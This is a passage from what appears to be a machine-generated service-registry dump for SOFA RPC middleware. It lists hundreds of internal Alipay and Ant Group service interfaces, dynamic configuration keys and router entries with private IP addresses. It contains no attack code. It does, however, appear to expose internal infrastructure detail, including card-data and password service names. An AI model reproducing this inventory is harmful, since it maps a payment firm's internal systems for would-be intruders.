d.BrandCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryShouldBeSettleAccItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.face.common.service.facade.FaceFunRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.ShowTemplateService:1.0:showTemplateService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:accorderexprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.creditutcore.common.service.facade.CreditAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_repository_supportKnowledgeReadRecordGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.CeCampEmulateTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.FaceTipsFacade:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmLeadsManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icertifycore.service.facade.api.biz.CertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ProdModelContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sessiontair@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.face.ZFaceService:1.0:zcorethorgpualipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.assistant.MiniAppRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.core.service.task.TaskHandler:1.0:composeImgItemTaskHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.riskmngTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:apshopcentermng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfocore.biz.infocenter.FinfoCenterYCTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:uctIndicatorQueryRpcSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.SearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.biz.accountorder.control.service.auth.builder.orderpay.ResponseToAuthRequestBuilder:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:apiresCommonTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_SG_SERVERLESS_TEST_CUSTOMPARAM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqdataservice.common.service.facade.yqapi.YuqingDataMessageConsumeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilesecurity.common.service.api.nickname.NicknameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscene.common.service.facade.api.CacheRefreshFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ISVManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.customerv2.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.cardcenter.facade.SensitiveCardInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zpublishuiweb.zpublishuiweb_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:voucherprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.opinion.facade.OpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.PasswordsRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.api.FileMoveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryBankDailyBalanceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.81.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acoffercenter.common.service.facade.metadata.AttrManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.42.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:ecquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.129.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.app.cifin.cifinDataSource.attributes.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanTaskShared.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.question.facade.MasterQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.links.common.service.facade.LinksTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeShopTopNewsPidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcustcore.common.service.facade.api.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SubjectControlServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.consumetrade.service.ConsumeTransOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmodelops.common.service.facade.intdata.api.IntDataServiceOperatorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.inner.MiniAppInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_SECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:ALIPAY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.avoidOperationLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchpunish.facade.complaintEvent.BrandComplaintEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.facade.execute.ExecuteFinishListener:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bkgwlite.common.service.facade.spi.TransReceiveService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.TestCaseLibraryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.OperatorServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_instpayShareDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.service.facade.ServiceProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:consumecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.28.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmodelpredict.biz.service.impl.abgroup.AbGroupRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zmyschecker.common.service.facade.servicemng.api.mng.MultiModelOSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.common.service.facade.api.aiload.AiLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.business.api.IBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.service.gw.community.api.reward.RewardManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappconfig.common.service.facade.nebula.MobileAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:keymap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.WatchTowerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AdaRobotSessionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.spi.api.ToolDataViewApi:1.0:fastq-easyapps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.dataoperate.DataOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbfeaturecenter.common.service.facade.UserSampleCenterConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.biz.check.spi.DetectService:1.0:singlerequestfundcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-dataserviceweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.process.ProviderBehalfApplyProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mwealthprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainconfigcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.ForestBarrageService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_XMONITOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifecore.common.service.facade.view.ComponentAuthOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:testapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.projectReviewerStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codprod.common.service.facade.merchant.facade.MerchantConfigDeleteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.sign.EcontractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.databoss.viewctrl.FilterConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.bizlogicide.common.service.facade.api.ProductIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.bills.BillInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.57.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.core.facade.CIJobQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:publictest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_GFFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchishub.core.service.common.AssetBaseTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2SnapshotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.growthplus.ai.AnalysisSubTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.116.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.55.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.operation.OperationTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.169.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.moee.common.service.facade.service.dataset.DataSetCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.customscenter_ccDS_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.AccItemSendDrm.recoverConcurrentCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.finaggexpcoreSecondChannelId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.facade.spec.SpecExecutor:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.80.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bdsProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SERVERLESS_APP_SERVICE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_MQ_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.industrygw.common.service.facade.MessagingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fporgassetdecision.common.service.facade.api.AssetInjectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.MobilePaymentCallbackFacade:1.0:unitradeprodMobilePaymentCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.contract.ContractQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.biz.shared.repository.BusinesstypePropsRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.facade.DsdbAssetCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowPresKaConsultationGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeStandardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsdesk.common.service.facade.biz.MetricQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.api.PushQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.vostroflux.service.api.VostroOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.simulated.api.SatransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.SceneAdminConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.MqDiagFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.mma.facade.api.AppNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recruitcore_planUpdateTaskNodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.BizLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.AntProcessAlarmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.indexEstimateConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.globalBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mhcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushTemplateGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ideploy.common.service.holder.service.HolderCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataquery.bill.service.facade.adaptor.service.prepay.PreVoucherOrderReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.179.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.migrate.SalesPlanBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.biz.check.spi.DetectService:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.acap.AcapPaymentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientAgrMappingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.access.InterfaceParamsManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openmonitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCLOANBENEFIT-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopprod.common.service.allin.facade.KbPropertyValueApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secutrade.common.service.facade.api.security.SecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minipcodemarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.ackcode.AckCodeValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.ApiAccessControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencommon.rcache.facade.RCacheMonitorFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.236.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_DCEPPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientAgrMappingMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.context.ContextQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.TinyAppAuditRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.AbExpVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.naegis.service.repay.warning.Warning4RepayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fingiftprod.common.service.facade.gift.GoldenGiftCreateActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.moneyfund.trade.manage.FundRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.integration.OstsActiveIntegrationCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldecisionguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.sac.OdpsSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.TextImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.ptcore.common.service.facade.api.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.graycore.common.service.facade.api.bizroute.BusinessPropertyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.decision.DecisionConcurrencyInterceptService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsManufacturerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.facade.api.contract.SignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openhome_commonAppAuditProcessRopNodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.cutFlowSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.MessageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.ordercore.OnePartyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.biz.decision.api.RecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airmng.common.service.facade.permission.AirmngURLFilterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfe.crowd.CrowdQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:giftgolding@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.admin.MiniResourceSwitchFacade:1.0@DEFAULT#@#DEFAULT_INST